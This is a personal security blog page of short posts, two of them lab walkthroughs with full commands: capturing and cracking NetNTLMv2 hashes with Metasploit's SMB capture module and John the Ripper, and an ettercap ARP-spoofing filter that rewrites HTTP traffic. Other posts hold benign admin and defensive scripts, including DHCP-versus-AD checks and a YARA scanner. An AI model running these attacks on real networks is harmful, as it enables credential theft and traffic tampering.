Friday, December 27, 2019

metasploit smb capture password hashes

create 2 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module

> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit

7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
        \\169.254.18.2\
      windows will popup an authentication prompt, enter a user & password  (e.g. guy, password)

8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt 
     type exit to exit metasploit
     run john against the newly captured file
       > john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt

     if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen



Posted by at 1 comment:
Labels: , , ,

compare dhcp leases to active directory pcs

python script

# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
#               Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
 notInADCount = 0
 searchedCount = 0
 for dhcpHost in dhcpFileHandle:
  foundIt = 0
  with open(adFile, 'r') as adFileHandle:
   for adHost in adFileHandle: 
    adHost = adHost.lower().strip()
    dhcpHost = dhcpHost.lower().strip()
    if dhcpHost == adHost:
     foundIt = 1
     break
  searchedCount = searchedCount + 1
  if foundIt == 0:
   print(dhcpHost, end='', file=notInADHandle)
   notInADCount = notInADCount + 1
   print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
Posted by at 1 comment:
Labels: ,

ettercap http replace man-in-the-middle full example

create 3 vms in virtualbox

1.) kali linux ATTACKER
      will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
       will be hosting the website the victim wants to access
3.) windows VICTIM
       will be the victim trying to access the web server


steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
       ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
       ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
      then launch python simple http server on port 8001
             python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
       http://169.254.18.2:8001/
     you will see the text
        "this is fun"

             

9.) on kali linux ATTACKER
      create an ettercap filter file with a text editor with this content and save as "fun.filter"
          if (ip.proto == TCP) {
           if (tcp.dst == 8001 || tcp.src == 8001) {
             if (search(DATA.data, "Accept-Encoding")) {
              replace("Accept-Encoding", "Accept-Nothing!");
              msg("removed encoding");
            }
            if (search(DATA.data, "fun")) {
             replace("fun", "evil");
             msg("fun is now evil");
            }
           }
          }
   
     NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response

     next compile the filter
         etterfilter fun.filter -o fun.ef
     next run ettercap using the filter and arp spoofing
         ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
       reload the website
         http://169.254.18.2:8001/
       you will now see the text
         "this is evil"




11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
Posted by at 1 comment:
Labels: , ,

Monday, December 23, 2019

update datetime on linux

# ntpdate 2.us.pool.ntp.org

syncs with internet time
Posted by at No comments:

navigator DOM keys

document.write("navigator.appName = " + navigator.appName + "<br/>")
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");



-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107

-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = 
-----------------
FireFox ESR on 64bit Kali Linux
-----------------

navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor = 
navigator.vendorSub = 
Posted by at No comments:
Labels: , ,

Friday, December 20, 2019

Virtual Box local contained lab, VM to VM

network for both kali & windows
"internal network"

on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up

on kali
ping windows

on windows
ping kali
Posted by at No comments:

Thursday, December 5, 2019

yaraOneLiner.py

# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file

import os
import subprocess
import traceback
import argparse
import sys

yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""

arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()

with open(settings.inputFileName, "r") as lines:
 for line in lines:
  line = line.rstrip()
  if settings.debug:
   print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
  if settings.status:
   if (lineNumber % 50) == 0 and lineNumber != 0:
    print("STATUS: processing line %s" % (str(lineNumber)))
  with open(tempFileName,"w") as tempfile:
   tempfile.write(line)
  try:
   yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
   if settings.debug:
    print("ABOUT TO RUN: %s" % yaraCommand)
   if settings.debug:
    pause = input()
   if settings.debug:
    print("STARTED: YARA")
   output = subprocess.check_output(yaraCommand, shell=True)
   if settings.debug:
    print("OUTPUT: %s" % str(output))
  except Exception as e:
   error = str(e)
   print("COMMAND: %s" % yaraCommand)
   print("OUTPUT: %s" % output)
   print("ERROR: %s" % error)
   output = ""
  if output is None or len(output) == 0:
   if settings.debug:
    print("MATCHES: 0 (no output)")
  else:
   output = str(output).replace("b'","").rstrip()
   if output[-1:] == "'":
    output = output[:-1]
   if tempFileName in output:
    if settings.debug:
     print("MATCHES: 1+")
    print("MATCH LINE NUMBER %s:" % str(lineNumber))
    print(" LINE: %s" + line)
    print(" YARA:")
    for row in output.split("\\r\\n"):
     row = row.replace("\\r\\n", "")
     if row.startswith("0x"):
      print("   %s" % row)
     else:
      print("  %s" % row)
   else:
    print("MATCHES: 0 (with output)")
  lineNumber = lineNumber + 1

Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)